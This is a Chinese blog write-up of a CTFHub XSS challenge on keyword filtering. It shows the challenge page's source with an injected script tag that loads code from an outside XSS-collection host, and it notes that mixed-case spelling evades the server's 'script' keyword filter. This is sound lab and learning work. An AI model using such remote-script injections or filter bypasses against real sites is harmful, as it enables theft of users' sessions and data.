当前位置：首页 > article >正文

CTFHUB技能树之XSS——过滤关键词

article 2024/10/25 16:39:36

开启靶场，打开链接：

看上去跟上一题应该差不多，应该只是添加多点过滤规则吧

直接拿xss平台的代码试试：

这时候突然听到xss平台的上线语音提醒：

成功得到flag：

ctfhub{6d068d22c56fa93532d63844}

居然这么快就过关了？有点不太相信，查看一下源代码：

<html lang="en"><head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>CTFHub 技能学习 | XSS 关键词过滤
    </title>
    <link rel="stylesheet" href="/static/bootstrap.min.css">
    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <script src="https://cdn.bootcss.com/html5shiv/3.7.3/html5shiv.min.js"></script>
    <script src="https://cdn.bootcss.com/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->
    <script src="/static/jquery.min.js"></script>
    <script src="/static/popper.min.js"></script>
    <script src="/static/bootstrap.min.js"></script>
</head>

<body>
    <div class="container">
        <div class="jumbotron text-center">
            <h1>
                XSS 关键词过滤
            </h1>
            <hr>
            <!-- Alert -->
            <div id="alert">
                <div id="success" class="alert alert-success" role="alert" style="display: none;"></div>
                <div id="fail" class="alert alert-danger" role="alert" style="display: none;"></div>
            </div>
            <!-- Body -->
            <div>
                <form action="" method="GET">
    <div class="input-group mb-3">
        <div class="input-group-prepend">
            <span class="input-group-text">What's your name</span>
        </div>
        <input type="text" class="form-control" placeholder="CTFHub" id="name" name="name">
        <div class="input-group-append">
            <input type="submit" value="Submit" class="btn btn-success">
        </div>
    </div>
</form>
<!-- Output -->
<hr>
<div>
    <h1>Hello, <script src="//xs.pe/6b6"></script>
    </h1>
</div>
<hr>
            </div>
            <!-- Submit -->
            <div>
                <h2>Send URL to Bot</h2>
<div class="input-group mb-3">
    <div class="input-group-prepend">
        <span class="input-group-text">URL</span>
    </div>
    <input type="text" class="form-control" id="url" name="url">
    <div class="input-group-append">
        <input type="button" id="Send" value="Send" class="btn btn-success" onclick="send()">
    </div>
    <script>
        function send() {
            let url = $("#url").val()
            $.ajax({
                type: "post",
                url: "/submit",
                dataType: "json",
                contentType: "application/json",
                data: JSON.stringify({
                    url: url
                }),
                success: function (d) {
                    if (d.code == -1) {
                        $("#fail").text(d.msg)
                        $("#fail").show();
                        setTimeout(function () {
                            $("#fail").hide();
                        }, 5000);
                    } else if (d.code == 0) {
                        $("#success").text(d.msg)
                        $("#success").show();
                        setTimeout(function () {
                            $("#success").hide();
                        }, 5000);
                    }
                }
            });
        }
    </script>
</div>
            </div>
        </div>
    </div>


</body></html>

好吧，看起来过滤规则是写在后端代码，前端代码没有任何信息，不过后面了解到是对关键词“script”进行了过滤，刚好复制的代码是大小写的，所以可以直接绕过

查看全文

http://www.kler.cn/news/364652.html